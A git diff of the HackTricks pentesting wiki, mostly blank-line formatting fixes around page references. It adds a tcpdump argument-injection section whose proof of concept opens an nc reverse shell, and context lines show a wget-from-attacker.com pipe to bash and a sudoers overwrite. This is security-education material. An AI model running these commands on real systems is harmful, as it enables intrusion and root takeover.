Don’t bind management to guest/public bridges; apply IPv6 firewalls on SSID bridges. +- Rate-limit and filter NDP/RS/RA on guest segments where feasible. +- For services that must be reachable, enforce authN/MFA and strong rate-limits. + ## References @@ -326,7 +379,6 @@ sudo mitm6 -i eth0 --no-ra # only DHCPv6 poisoning - [http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html](http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html) - [https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904](https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904) - [Practical Guide to IPv6 Attacks in a Local Network](https://habr.com/ru/articles/930526/) +- [FiberGateway GR241AG – Full Exploit Chain](https://r0ny.net/FiberGateway-GR241AG-Full-Exploit-Chain/) {{#include ../../banners/hacktricks-training.md}} - - diff --git a/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md b/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md index 484ce2343..e0945ef75 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md +++ b/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md @@ -119,6 +119,7 @@ These tools and techniques form a comprehensive set for conducting NTLM Relay at In Windows you **may be able to force some privileged accounts to authenticate to arbitrary machines**. Read the following page to learn how: + {{#ref}} ../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md {{#endref}} @@ -245,4 +246,3 @@ You now own **NT AUTHORITY\SYSTEM**. {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/generic-methodologies-and-resources/pentesting-wifi/README.md b/src/generic-methodologies-and-resources/pentesting-wifi/README.md index 1f7a9b166..aeac6c3b6 100644 --- a/src/generic-methodologies-and-resources/pentesting-wifi/README.md +++ b/src/generic-methodologies-and-resources/pentesting-wifi/README.md @@ -23,6 +23,7 @@ iwlist wlan0 scan #Scan available wifis ### Hijacker & NexMon (Android internal Wi-Fi) + {{#ref}} enable-nexmon-monitor-and-injection-on-android.md {{#endref}} @@ -796,4 +797,3 @@ TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/generic-methodologies-and-resources/phishing-methodology/README.md b/src/generic-methodologies-and-resources/phishing-methodology/README.md index e50a993b4..50251587a 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/README.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/README.md @@ -26,6 +26,7 @@ - **New TLD**: Same domain using a **new TLD** (e.g., zelster.org) - **Homoglyph**: It **replaces** a letter in the domain name with **letters that look similar** (e.g., zelfser.com). + {{#ref}} homograph-attacks.md {{#endref}} @@ -414,6 +415,7 @@ Once everything is ready, just launch the campaign! If for any reason you want to clone the website check the following page: + {{#ref}} clone-a-website.md {{#endref}} @@ -423,6 +425,7 @@ clone-a-website.md In some phishing assessments (mainly for Red Teams) you will want to also **send files containing some kind of backdoor** (maybe a C2 or maybe just something that will trigger an authentication).\ Check out the following page for some examples: + {{#ref}} phishing-documents.md {{#endref}} @@ -452,6 +455,7 @@ One easy way to check if you domain appears in any blacklist is to use [https:// However, there are other ways to know if the victim is **actively looking for suspicions phishing activity in the wild** as explained in: + {{#ref}} detecting-phising.md {{#endref}} @@ -557,12 +561,14 @@ Monitor for AzureAD/AWS/Okta events where **`deleteMFA` + `addMFA`** occur **wit Attackers can silently copy malicious commands into the victim’s clipboard from a compromised or typosquatted web page and then trick the user to paste them inside **Win + R**, **Win + X** or a terminal window, executing arbitrary code without any download or attachment. + {{#ref}} clipboard-hijacking.md {{#endref}} ## Mobile Phishing & Malicious App Distribution (Android & iOS) + {{#ref}} mobile-phishing-malicious-apps.md {{#endref}} @@ -577,4 +583,3 @@ mobile-phishing-malicious-apps.md {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md b/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md index 195dd87af..ed70fe101 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md @@ -84,7 +84,8 @@ Blue-teams can combine clipboard, process-creation and registry telemetry to pin ## Related Tricks * **Discord Invite Hijacking** often abuses the same ClickFix approach after luring users into a malicious server: - {{#ref}} + +{{#ref}} discord-invite-hijacking.md {{#endref}} @@ -93,4 +94,4 @@ Blue-teams can combine clipboard, process-creation and registry telemetry to pin - [Fix the Click: Preventing the ClickFix Attack Vector](https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/) - [Pastejacking PoC – GitHub](https://github.com/dxa4481/Pastejacking) -{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md index 8c98a15de..519818c77 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md @@ -150,10 +150,12 @@ There are several ways to **force NTLM authentication "remotely"**, for example, **Check these ideas and more in the following pages:** + {{#ref}} ../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md {{#endref}} + {{#ref}} ../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md {{#endref}} @@ -168,4 +170,3 @@ Don't forget that you cannot only steal the hash or the authentication but also {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md b/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md index 46c518dde..006748ab6 100644 --- a/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md +++ b/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md @@ -708,6 +708,7 @@ if __name__ == "__main__": You can check the output of this script on this page: + {{#ref}} https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/python/bypass-python-sandboxes/broken-reference/README.md {{#endref}} @@ -765,6 +766,7 @@ class HAL9000(object): > [!CAUTION] > Check also the following page for gadgets that will r**ead sensitive information from Python internal objects**: + {{#ref}} ../python-internal-read-gadgets.md {{#endref}} @@ -1114,6 +1116,7 @@ Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) o **Check out this tutorial**: + {{#ref}} ../../basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md {{#endref}} diff --git a/src/generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md b/src/generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md index 7734330a0..7335db3c1 100644 --- a/src/generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md +++ b/src/generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md @@ -259,6 +259,7 @@ Use this payload to **change `app.secret_key`** (the name in your app might be d Check also the following page for more read only gadgets: + {{#ref}} python-internal-read-gadgets.md {{#endref}} @@ -270,4 +271,3 @@ python-internal-read-gadgets.md {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/hardware-physical-access/firmware-analysis/README.md b/src/hardware-physical-access/firmware-analysis/README.md index e1f5d80b7..985603ec5 100644 --- a/src/hardware-physical-access/firmware-analysis/README.md +++ b/src/hardware-physical-access/firmware-analysis/README.md @@ -6,6 +6,7 @@ ### Related resources + {{#ref}} synology-encrypted-archive-decryption.md {{#endref}} @@ -61,6 +62,7 @@ If you don't find much with those tools check the **entropy** of the image with Moreover, you can use these tools to extract **files embedded inside the firmware**: + {{#ref}} ../../generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md {{#endref}} @@ -309,4 +311,3 @@ To practice discovering vulnerabilities in firmware, use the following vulnerabl {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/bypass-bash-restrictions/README.md b/src/linux-hardening/bypass-bash-restrictions/README.md index 6bb8468f6..085478bbb 100644 --- a/src/linux-hardening/bypass-bash-restrictions/README.md +++ b/src/linux-hardening/bypass-bash-restrictions/README.md @@ -330,12 +330,14 @@ ln /f* If you are inside a filesystem with the **read-only and noexec protections** or even in a distroless container, there are still ways to **execute arbitrary binaries, even a shell!:** + {{#ref}} bypass-fs-protections-read-only-no-exec-distroless/ {{#endref}} ## Chroot & other Jails Bypass + {{#ref}} ../privilege-escalation/escaping-from-limited-bash.md {{#endref}} @@ -374,4 +376,3 @@ Practical use cases: {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md b/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md index 0ae1f001e..023c052db 100644 --- a/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md +++ b/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md @@ -69,6 +69,7 @@ wget -O- https://attacker.com/binary.elf | base64 -w0 | bash ddexec.sh argv0 foo For more information about this technique check the Github or: + {{#ref}} ddexec.md {{#endref}} @@ -114,4 +115,3 @@ You can find **examples** on how to **exploit some RCE vulnerabilities** to get {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/freeipa-pentesting.md b/src/linux-hardening/freeipa-pentesting.md index baa1624de..3591668be 100644 --- a/src/linux-hardening/freeipa-pentesting.md +++ b/src/linux-hardening/freeipa-pentesting.md @@ -43,6 +43,7 @@ Keytab files, containing Kerberos principals and encrypted keys, are critical fo You can find more information about how to use tickets in linux in the following link: + {{#ref}} privilege-escalation/linux-active-directory.md {{#endref}} @@ -198,4 +199,3 @@ You can check a detailed explaination in [https://posts.specterops.io/attacking- {{#include ../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/linux-post-exploitation/README.md b/src/linux-hardening/linux-post-exploitation/README.md index 221f36e7d..4b883891e 100644 --- a/src/linux-hardening/linux-post-exploitation/README.md +++ b/src/linux-hardening/linux-post-exploitation/README.md @@ -6,6 +6,7 @@ Let's configure a PAM module to log each password each user uses to login. If you don't know what is PAM check: + {{#ref}} pam-pluggable-authentication-modules.md {{#endref}} @@ -55,4 +56,3 @@ The Pluggable Authentication Module (PAM) is a system used under Linux for user {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/README.md index e2b207ad1..835a6bdb1 100644 --- a/src/linux-hardening/privilege-escalation/README.md +++ b/src/linux-hardening/privilege-escalation/README.md @@ -159,6 +159,7 @@ cat /proc/sys/kernel/randomize_va_space 2>/dev/null If you are inside a docker container you can try to escape from it: + {{#ref}} docker-security/ {{#endref}} @@ -410,6 +411,7 @@ rsync -a *.sh rsync://host.back/src/rbd #You can create a file called "-e sh mys Read the following page for more wildcard exploitation tricks: + {{#ref}} wildcards-spare-tricks.md {{#endref}} @@ -563,6 +565,7 @@ socat - UNIX-CLIENT:/dev/socket #connect to UNIX-domain socket, irrespective of **Exploitation example:** + {{#ref}} socket-command-injection.md {{#endref}} @@ -632,6 +635,7 @@ Note that if you have write permissions over the docker socket because you are * Check **more ways to break out from docker or abuse it to escalate privileges** in: + {{#ref}} docker-security/ {{#endref}} @@ -640,6 +644,7 @@ docker-security/ If you find that you can use the **`ctr`** command read the following page as **you may be able to abuse it to escalate privileges**: + {{#ref}} containerd-ctr-privilege-escalation.md {{#endref}} @@ -648,6 +653,7 @@ containerd-ctr-privilege-escalation.md If you find that you can use the **`runc`** command read the following page as **you may be able to abuse it to escalate privileges**: + {{#ref}} runc-privilege-escalation.md {{#endref}} @@ -675,6 +681,7 @@ Policies without a specified user or group apply universally, while "default" co **Learn how to enumerate and exploit a D-Bus communication here:** + {{#ref}} d-bus-enumeration-and-command-injection-privilege-escalation.md {{#endref}} @@ -762,6 +769,7 @@ Some Linux versions were affected by a bug that allows users with **UID > INT_MA Check if you are a **member of some group** that could grant you root privileges: + {{#ref}} interesting-groups-linux-pe/ {{#endref}} @@ -1049,10 +1057,12 @@ The project collects legitimate functions of Unix binaries that can be abused to > strace -o /dev/null /bin/sh\ > sudo awk 'BEGIN {system("/bin/sh")}' + {{#ref}} https://gtfobins.github.io/ {{#endref}} + {{#ref}} https://gtfoargs.github.io/ {{#endref}} @@ -1175,6 +1185,7 @@ That means that the configuration files from `/etc/ld.so.conf.d/*.conf` will be If for some reason **a user has write permissions** on any of the paths indicated: `/etc/ld.so.conf`, `/etc/ld.so.conf.d/`, any file inside `/etc/ld.so.conf.d/` or any folder within the config file inside `/etc/ld.so.conf.d/*.conf` he may be able to escalate privileges.\ Take a look at **how to exploit this misconfiguration** in the following page: + {{#ref}} ld.so.conf-example.md {{#endref}} @@ -1223,6 +1234,7 @@ int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp Linux capabilities provide a **subset of the available root privileges to a process**. This effectively breaks up root **privileges into smaller and distinctive units**. Each of these units can then be independently granted to processes. This way the full set of privileges is reduced, decreasing the risks of exploitation.\ Read the following page to **learn more about capabilities and how to abuse them**: + {{#ref}} linux-capabilities.md {{#endref}} @@ -1353,6 +1365,7 @@ The file `/etc/sshd_config` can **allow** or **denied** ssh-agent forwarding wit If you find that Forward Agent is configured in an environment read the following page as **you may be able to abuse it to escalate privileges**: + {{#ref}} ssh-forward-agent-exploitation.md {{#endref}} @@ -1598,18 +1611,21 @@ On the other hand, `/etc/init` is associated with **Upstart**, a newer **service ### NFS Privilege escalation + {{#ref}} nfs-no_root_squash-misconfiguration-pe.md {{#endref}} ### Escaping from restricted Shells + {{#ref}} escaping-from-limited-bash.md {{#endref}} ### Cisco - vmanage + {{#ref}} cisco-vmanage.md {{#endref}} @@ -1663,9 +1679,9 @@ cisco-vmanage.md Android rooting frameworks commonly hook a syscall to expose privileged kernel functionality to a userspace manager. Weak manager authentication (e.g., signature checks based on FD-order or poor password schemes) can enable a local app to impersonate the manager and escalate to root on already-rooted devices. Learn more and exploitation details here: + {{#ref}} android-rooting-frameworks-manager-auth-bypass-syscall-hook.md {{#endref}} {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md b/src/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md index af46ecb18..0e48f5000 100644 --- a/src/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md +++ b/src/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md @@ -6,6 +6,7 @@ Go to the following link to learn **what is containerd** and `ctr`: + {{#ref}} ../../network-services-pentesting/2375-pentesting-docker.md {{#endref}} @@ -45,6 +46,7 @@ You can run a privileged container as: Then you can use some of the techniques mentioned in the following page to **escape from it abusing privileged capabilities**: + {{#ref}} docker-security/ {{#endref}} @@ -52,4 +54,3 @@ docker-security/ {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/privilege-escalation/docker-security/README.md b/src/linux-hardening/privilege-escalation/docker-security/README.md index 495a04d57..a966a8f98 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/README.md +++ b/src/linux-hardening/privilege-escalation/docker-security/README.md @@ -155,6 +155,7 @@ Docker makes use of the following Linux kernel Namespaces to achieve Container i For **more information about the namespaces** check the following page: + {{#ref}} namespaces/ {{#endref}} @@ -178,6 +179,7 @@ ls -l /proc//ns #Get the Group and the namespaces (some may be uniq to the For more information check: + {{#ref}} cgroups.md {{#endref}} @@ -188,6 +190,7 @@ Capabilities allow **finer control for the capabilities that can be allowed** fo When a docker container is run, the **process drops sensitive capabilities that the proccess could use to escape from the isolation**. This try to assure that the proccess won't be able to perform sensitive actions and escape: + {{#ref}} ../linux-capabilities.md {{#endref}} @@ -196,6 +199,7 @@ When a docker container is run, the **process drops sensitive capabilities that This is a security feature that allows Docker to **limit the syscalls** that can be used inside the container: + {{#ref}} seccomp.md {{#endref}} @@ -204,6 +208,7 @@ seccomp.md **AppArmor** is a kernel enhancement to confine **containers** to a **limited** set of **resources** with **per-program profiles**.: + {{#ref}} apparmor.md {{#endref}} @@ -218,6 +223,7 @@ apparmor.md This mechanism ensures that even if a process within a container is compromised, it's confined to interacting only with objects that have the corresponding labels, significantly limiting the potential damage from such compromises. + {{#ref}} ../selinux.md {{#endref}} @@ -231,6 +237,7 @@ In Docker, an authorization plugin plays a crucial role in security by deciding These contexts help ensure that only legitimate requests from authenticated users are processed, enhancing the security of Docker operations. + {{#ref}} authz-and-authn-docker-access-authorization-plugin.md {{#endref}} @@ -261,6 +268,7 @@ nc -lvp 4444 >/dev/null & while true; do cat /dev/urandom | nc 4444; In the following page you can learn **what does the `--privileged` flag imply**: + {{#ref}} docker-privileged.md {{#endref}} @@ -341,6 +349,7 @@ In Kubernetes environments, secrets are natively supported and can be further ma **gVisor** is an application kernel, written in Go, that implements a substantial portion of the Linux system surface. It includes an [Open Container Initiative (OCI)](https://www.opencontainers.org) runtime called `runsc` that provides an **isolation boundary between the application and the host kernel**. The `runsc` runtime integrates with Docker and Kubernetes, making it simple to run sandboxed containers. + {{#ref}} https://github.com/google/gvisor {{#endref}} @@ -349,6 +358,7 @@ https://github.com/google/gvisor **Kata Containers** is an open source community working to build a secure container runtime with lightweight virtual machines that feel and perform like containers, but provide **stronger workload isolation using hardware virtualization** technology as a second layer of defense. + {{#ref}} https://katacontainers.io/ {{#endref}} @@ -374,6 +384,7 @@ https://katacontainers.io/ If you are **inside a docker container** or you have access to a user in the **docker group**, you could try to **escape and escalate privileges**: + {{#ref}} docker-breakout-privilege-escalation/ {{#endref}} @@ -382,6 +393,7 @@ docker-breakout-privilege-escalation/ If you have access to the docker socket or have access to a user in the **docker group but your actions are being limited by a docker auth plugin**, check if you can **bypass it:** + {{#ref}} authz-and-authn-docker-access-authorization-plugin.md {{#endref}} @@ -408,4 +420,3 @@ authz-and-authn-docker-access-authorization-plugin.md - [https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/](https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/) {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md index 1d7ffd35c..695f3d083 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md +++ b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md @@ -64,6 +64,7 @@ capsh --print In the following page you can **learn more about linux capabilities** and how to abuse them to escape/escalate privileges: + {{#ref}} ../../linux-capabilities.md {{#endref}} @@ -84,6 +85,7 @@ A privileged container can be created with the flag `--privileged` or disabling The `--privileged` flag significantly lowers container security, offering **unrestricted device access** and bypassing **several protections**. For a detailed breakdown, refer to the documentation on `--privileged`'s full impacts. + {{#ref}} ../docker-privileged.md {{#endref}} @@ -230,6 +232,7 @@ cat /output Find an **explanation of the technique** in: + {{#ref}} docker-release_agent-cgroups-escape.md {{#endref}} @@ -238,6 +241,7 @@ docker-release_agent-cgroups-escape.md In the previous exploits the **absolute path of the container inside the hosts filesystem is disclosed**. However, this isn’t always the case. In cases where you **don’t know the absolute path of the container inside the host** you can use this technique: + {{#ref}} release_agent-exploit-relative-paths-to-pids.md {{#endref}} @@ -345,6 +349,7 @@ The abuse of these files may allow that: However, you can find **other sensitive files** to check for in this page: + {{#ref}} sensitive-mounts.md {{#endref}} @@ -640,4 +645,3 @@ If you are in **userspace** (**no kernel exploit** involved) the way to find new {{#include ../../../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-privileged.md b/src/linux-hardening/privilege-escalation/docker-security/docker-privileged.md index 8094e0eef..9613364e7 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/docker-privileged.md +++ b/src/linux-hardening/privilege-escalation/docker-security/docker-privileged.md @@ -98,6 +98,7 @@ mount | grep /proc.*tmpfs Container engines launch the containers with a **limited number of capabilities** to control what goes on inside of the container by default. **Privileged** ones have **all** the **capabilities** accesible. To learn about capabilities read: + {{#ref}} ../linux-capabilities.md {{#endref}} @@ -136,6 +137,7 @@ You can manipulate the capabilities available to a container without running in **Seccomp** is useful to **limit** the **syscalls** a container can call. A default seccomp profile is enabled by default when running docker containers, but in privileged mode it is disabled. Learn more about Seccomp here: + {{#ref}} seccomp.md {{#endref}} @@ -175,6 +177,7 @@ Also, note that when Docker (or other CRIs) are used in a **Kubernetes** cluster **AppArmor** is a kernel enhancement to confine **containers** to a **limited** set of **resources** with **per-program profiles**. When you run with the `--privileged` flag, this protection is disabled. + {{#ref}} apparmor.md {{#endref}} @@ -188,6 +191,7 @@ apparmor.md Running a container with the `--privileged` flag disables **SELinux labels**, causing it to inherit the label of the container engine, typically `unconfined`, granting full access similar to the container engine. In rootless mode, it uses `container_runtime_t`, while in root mode, `spc_t` is applied. + {{#ref}} ../selinux.md {{#endref}} @@ -242,4 +246,3 @@ PID USER TIME COMMAND {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/README.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/README.md index 186a370b9..cb19ee9ae 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/README.md +++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/README.md @@ -4,42 +4,49 @@ ### **PID namespace** + {{#ref}} pid-namespace.md {{#endref}} ### **Mount namespace** + {{#ref}} mount-namespace.md {{#endref}} ### **Network namespace** + {{#ref}} network-namespace.md {{#endref}} ### **IPC Namespace** + {{#ref}} ipc-namespace.md {{#endref}} ### **UTS namespace** + {{#ref}} uts-namespace.md {{#endref}} ### Time Namespace + {{#ref}} time-namespace.md {{#endref}} ### User namespace + {{#ref}} user-namespace.md {{#endref}} @@ -47,4 +54,3 @@ user-namespace.md {{#include ../../../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md index 509716f87..e71268fa3 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md +++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md @@ -16,6 +16,7 @@ While cgroup namespaces are not a separate namespace type like the others we dis For more information about CGroups check: + {{#ref}} ../cgroups.md {{#endref}} @@ -92,4 +93,3 @@ Also, you can only **enter in another process namespace if you are root**. And y {{#include ../../../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/privilege-escalation/escaping-from-limited-bash.md b/src/linux-hardening/privilege-escalation/escaping-from-limited-bash.md index 93e551b7e..00ced0c60 100644 --- a/src/linux-hardening/privilege-escalation/escaping-from-limited-bash.md +++ b/src/linux-hardening/privilege-escalation/escaping-from-limited-bash.md @@ -231,6 +231,7 @@ wget http://127.0.0.1:8080/sudoers -O /etc/sudoers [https://gtfobins.github.io](https://gtfobins.github.io/**](https/gtfobins.github.io)\ **It could also be interesting the page:** + {{#ref}} ../bypass-bash-restrictions/ {{#endref}} @@ -239,6 +240,7 @@ wget http://127.0.0.1:8080/sudoers -O /etc/sudoers Tricks about escaping from python jails in the following page: + {{#ref}} ../../generic-methodologies-and-resources/python/bypass-python-sandboxes/ {{#endref}} @@ -292,4 +294,3 @@ debug.debug() {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md b/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md index 41b1efe5e..161d5810c 100644 --- a/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md +++ b/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md @@ -235,22 +235,26 @@ docker run --rm -it --pid=host --net=host --privileged -v /:/mnt chr Finally, if you don't like any of the suggestions of before, or they aren't working for some reason (docker api firewall?) you could always try to **run a privileged container and escape from it** as explained here: + {{#ref}} ../docker-security/ {{#endref}} If you have write permissions over the docker socket read [**this post about how to escalate privileges abusing the docker socket**](../index.html#writable-docker-socket)**.** + {{#ref}} https://github.com/KrustyHack/docker-privilege-escalation {{#endref}} + {{#ref}} https://fosterelli.co/privilege-escalation-via-docker.html {{#endref}} ## lxc/lxd Group + {{#ref}} ./ {{#endref}} @@ -266,4 +270,3 @@ Inside OpenBSD the **auth** group usually can write in the folders _**/etc/skey* These permissions may be abused with the following exploit to **escalate privileges** to root: [https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot](https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot) {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/privilege-escalation/linux-active-directory.md b/src/linux-hardening/privilege-escalation/linux-active-directory.md index 3d028c054..b13f8e8c7 100644 --- a/src/linux-hardening/privilege-escalation/linux-active-directory.md +++ b/src/linux-hardening/privilege-escalation/linux-active-directory.md @@ -14,6 +14,7 @@ If you have access over an AD in linux (or bash in Windows) you can try [https:/ You can also check the following page to learn **other ways to enumerate AD from linux**: + {{#ref}} ../../network-services-pentesting/pentesting-ldap.md {{#endref}} @@ -22,6 +23,7 @@ You can also check the following page to learn **other ways to enumerate AD from FreeIPA is an open-source **alternative** to Microsoft Windows **Active Directory**, mainly for **Unix** environments. It combines a complete **LDAP directory** with an MIT **Kerberos** Key Distribution Center for management akin to Active Directory. Utilizing the Dogtag **Certificate System** for CA & RA certificate management, it supports **multi-factor** authentication, including smartcards. SSSD is integrated for Unix authentication processes. Learn more about it in: + {{#ref}} ../freeipa-pentesting.md {{#endref}} @@ -32,6 +34,7 @@ FreeIPA is an open-source **alternative** to Microsoft Windows **Active Director In this page you are going to find different places were you could **find kerberos tickets inside a linux host**, in the following page you can learn how to transform this CCache tickets formats to Kirbi (the format you need to use in Windows) and also how to perform a PTT attack: + {{#ref}} ../../windows-hardening/active-directory-methodology/pass-the-ticket.md {{#endref}} @@ -126,4 +129,3 @@ crackmapexec 10.XXX.XXX.XXX -u 'ServiceAccount$' -H "HashPlaceholder" -d "YourDO {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/privilege-escalation/linux-capabilities.md b/src/linux-hardening/privilege-escalation/linux-capabilities.md index 731ab0324..706d7774f 100644 --- a/src/linux-hardening/privilege-escalation/linux-capabilities.md +++ b/src/linux-hardening/privilege-escalation/linux-capabilities.md @@ -1413,6 +1413,7 @@ kill -s SIGUSR1 # After an URL to access the debugger will appear. e.g. ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d ``` + {{#ref}} electron-cef-chromium-debugger-abuse.md {{#endref}} @@ -1676,4 +1677,3 @@ In summary, `CAP_SETPCAP` allows a process to modify the capability sets of othe {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md b/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md index 08071e298..561659010 100644 --- a/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md +++ b/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md @@ -15,6 +15,7 @@ In the **/etc/exports** file, if you find some directory that is configured as * For more information about **NFS** check: + {{#ref}} ../../network-services-pentesting/nfs-service-pentesting.md {{#endref}} @@ -143,4 +144,3 @@ drwxr-x--- 6 1008 1009 1024 Apr 5 2017 9.3_old {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/privilege-escalation/runc-privilege-escalation.md b/src/linux-hardening/privilege-escalation/runc-privilege-escalation.md index fcb76fc40..12514ce62 100644 --- a/src/linux-hardening/privilege-escalation/runc-privilege-escalation.md +++ b/src/linux-hardening/privilege-escalation/runc-privilege-escalation.md @@ -6,6 +6,7 @@ If you want to learn more about **runc** check the following page: + {{#ref}} ../../network-services-pentesting/2375-pentesting-docker.md {{#endref}} @@ -44,4 +45,3 @@ runc run demo {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md b/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md index 8d796fd17..574760fd1 100644 --- a/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md +++ b/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md @@ -120,6 +120,52 @@ These primitives are less common than the *tar/rsync/zip* classics but worth che --- +## tcpdump rotation hooks (-G/-W/-z): RCE via argv injection in wrappers + +When a restricted shell or vendor wrapper builds a `tcpdump` command line by concatenating user-controlled fields (e.g., a "file name" parameter) without strict quoting/validation, you can smuggle extra `tcpdump` flags. The combo of `-G` (time-based rotation), `-W` (limit number of files), and `-z ` (post-rotate command) yields arbitrary command execution as the user running tcpdump (often root on appliances). + +Preconditions: + +- You can influence `argv` passed to `tcpdump` (e.g., via a wrapper like `/debug/tcpdump --filter=... --file-name=`). +- The wrapper does not sanitize spaces or `-`-prefixed tokens in the file name field. + +Classic PoC (executes a reverse shell script from a writable path): + +```sh +# Reverse shell payload saved on the device (e.g., USB, tmpfs) +cat > /mnt/disk1_1/rce.sh <<'EOF' +#!/bin/sh +rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.2.10 4444 >/tmp/f +EOF +chmod +x /mnt/disk1_1/rce.sh + +# Inject additional tcpdump flags via the 